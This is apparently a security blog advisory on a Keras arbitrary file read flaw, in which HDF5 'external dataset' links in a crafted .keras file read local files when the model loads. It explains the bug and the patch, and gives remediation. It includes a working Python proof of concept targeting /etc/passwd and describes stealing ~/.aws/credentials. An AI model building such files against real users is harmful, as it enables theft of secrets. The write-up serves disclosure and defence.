Feb 18, 2026·6 min read·11 visits
Keras blindly trusted HDF5 'external datasets' when loading models. Attackers can craft a .keras file where the model weights are actually pointers to local files on the victim's machine. When loaded, the model reads your secrets into memory as tensors.
A high-severity Arbitrary File Read vulnerability in the Keras machine learning library allows attackers to exfiltrate sensitive local files (like /etc/passwd or AWS credentials) by embedding 'External Storage' links within malicious HDF5 model files. This affects Keras versions 3.0.0 through 3.13.1.
We live in an era where 'pip install' and 'model.load()' are typed with reckless abandon. Developers treat machine learning models like static assets—big bags of floating-point numbers that magically detect cats or translate French. But under the hood, the standard formats for these models are complex, structured filesystems. Keras, the high-level API that powers a massive chunk of the deep learning ecosystem, relies heavily on HDF5 (Hierarchical Data Format version 5) for saving and loading these weights.
Here is the problem: HDF5 isn't just a container for numbers; it's a feature-rich legacy format that supports everything from compression to complex object linking. One of those features is 'External Storage'—a mechanism designed to keep file sizes down by pointing a dataset to an external file on the disk rather than embedding the data.
CVE-2026-1669 is the classic story of a feature becoming a bug. By failing to validate these external links, Keras turned every load_model() call into a potential arbitrary file read primitive. If you are a security researcher, this is the kind of logic flaw you dream about: no memory corruption, no race conditions, just a polite request to the operating system to hand over its secrets.
To understand this exploit, you have to understand how Keras uses h5py. When you save a model to .keras or .h5, Keras maps the neural network layers to HDF5 groups and the weights (kernels and biases) to HDF5 datasets. A dataset is usually a multidimensional array of numbers stored contiguously in the file.
However, the HDF5 specification allows a dataset to be 'contiguous', 'chunked', or 'external'. When a dataset is marked as external, the HDF5 header effectively says: "The data for this array isn't here. Go look in /etc/passwd at offset 0."
> [!NOTE]
> This is not a bug in HDF5 or h5py. It is a documented feature for scientists who want to reference massive raw data files without duplicating them. The vulnerability lies entirely in Keras blindly assuming that every dataset it encounters is internal and safe.
The Keras loading logic iterates through the HDF5 structure, sees a dataset, and asks h5py to read it into a NumPy array. h5py, being a dutiful library, sees the external flag, resolves the path, opens the file, and reads the bytes. Keras then wraps those bytes in a Tensor and hands them to your GPU. Congratulations, your SSH private key is now a bias vector in a Dense layer.
Let's look at the vulnerable code path in keras/src/saving/saving_lib.py (pre-3.13.2). The loader would recursively walk through the HDF5 groups. When it found a dataset, it simply accessed it. In Python's h5py, accessing a dataset behaves like reading an array—it triggers the I/O immediately.
The fix, introduced in commit 8a37f9d, is a masterclass in 'better late than never.' The maintainers introduced a centralized verification step _verify_dataset that explicitly checks the .external attribute of the HDF5 dataset object before allowing any data to be read.
Here is the critical diff:
# patched version of _verify_dataset
def _verify_dataset(self, dataset):
if not isinstance(dataset, h5py.Dataset):
raise ValueError(f"Expected Dataset, got {type(dataset)}")
# THE FIX: Explicitly ban external links
if dataset.external:
raise ValueError(
"Not allowed: H5 file Dataset with external links: "
f"{dataset.external}"
)
return datasetThey also removed items() and values() methods from their H5WeightsStore class, forcing all access through __getitem__, which now includes this mandatory security check. It is a robust fix because it kills the vulnerability at the data-access layer, rather than trying to sanitize paths or restrict filenames.
Exploiting this is trivially easy and requires no advanced binary exploitation skills. We just need to create a valid HDF5 file that defines a dataset pointing to a sensitive file. We can do this using standard Python libraries.
Imagine an attacker uploads a model to a public repository claiming to be the new state-of-the-art 'LLM-finetuner'. Here is how they build the trap:
import h5py
import numpy as np
# Target file we want to steal
target_file = '/etc/passwd'
# Or on Windows: 'C:\\Windows\\win.ini'
print(f"[*] Crafting malicious model pointing to {target_file}...")
with h5py.File('suspicious_model.keras', 'w') as f:
# Create a dummy group structure Keras expects
layer_group = f.create_group('layers')
dense_group = layer_group.create_group('dense_1')
# Define the 'external' list: (filename, offset, size)
# h5py.h5f.UNLIMITED allows reading the whole file
external_link = [(target_file, 0, h5py.h5f.UNLIMITED)]
# Create the dataset.
# The shape must roughly match the file size or be large enough.
# We use uint8 to read raw bytes.
f.create_dataset('vars', shape=(2048,), dtype='uint8',
external=external_link)
print("[+] Malicious payload created.")When the victim runs keras.models.load_model('suspicious_model.keras'), Keras will throw an error eventually because the file content (text) won't look like valid float32 weights for a neural network. However, by the time the error is thrown, the read has likely already occurred, or if the attacker is clever, they can map the file to a byte or string tensor which Keras might accept for certain metadata fields.
So the model reads /etc/passwd. How does the attacker get it? This is where the context matters. In a local attack, the data is just in memory. But consider a Machine Learning-as-a-Service (MLaaS) environment or a CI/CD pipeline.
The most dangerous scenario is a system that allows users to upload a model for fine-tuning or evaluation. The backend loads the model (reading the server's local secrets like AWS credentials from ~/.aws/credentials), and if the attacker can trigger a save or export of the model later, those 'external' bytes might be saved as 'internal' bytes in the new file, which the attacker then downloads.
The remediation is straightforward: Update Keras to version 3.13.2 immediately. This version contains the dataset.external check that neutralizes the attack vector entirely.
If you cannot update (perhaps you are stuck on a legacy stack), you must treat all .keras and .h5 files as untrusted binaries. Do not load them outside of a sandboxed environment. You can also manually inspect files before loading using the h5dump command-line utility:
# Check for external storage configuration
h5dump -H malicious.keras | grep "EXTERNAL_FILE"If that grep returns anything, delete the file and burn the hard drive (metaphorically speaking). This vulnerability serves as a stark reminder that 'data' formats are often code in disguise.
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N| Product | Affected Versions | Fixed Version |
|---|---|---|
Keras Google | >= 3.0.0, < 3.13.2 | 3.13.2 |
| Attribute | Detail |
|---|---|
| CWE ID | CWE-73 (External Control of File Name or Path) |
| CVSS v4.0 | 7.1 (High) |
| Attack Vector | Network / Local |
| EPSS Score | 0.00039 |
| Exploit Maturity | Proof of Concept (PoC) |
| Affected Component | keras.src.saving.saving_lib |
The software allows user input to control or influence paths or file names that are used in filesystem operations.